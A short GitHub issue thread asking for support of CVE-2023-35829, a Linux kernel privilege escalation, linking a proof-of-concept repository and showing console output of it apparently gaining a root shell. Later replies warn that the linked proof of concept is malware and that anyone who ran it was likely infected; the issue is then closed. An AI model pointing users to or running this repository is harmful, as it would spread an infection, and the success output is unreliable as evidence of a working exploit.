Add support for CVE-2023-35829

Question

Add support for CVE-2023-35829

LordCasser opened this issue a year ago · 3 comments

https://github.com/ChriSanders22/CVE-2023-35829-poc

Answer 1 · 2023-07-05T03:50:03.000Z

chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)

Answer 2 · 2023-07-14T17:15:28.000Z

CVE-2023-35829-poc is malware, take a look at the following article. If you ran this you likely have been infected.

Answer 3 · 2023-07-24T14:22:51.000Z

CVE-2023-35829-poc is malware, take a look at the following article. If you ran this you likely have been infected.

yeap, I awared of that after I review some code. so I will close this issue.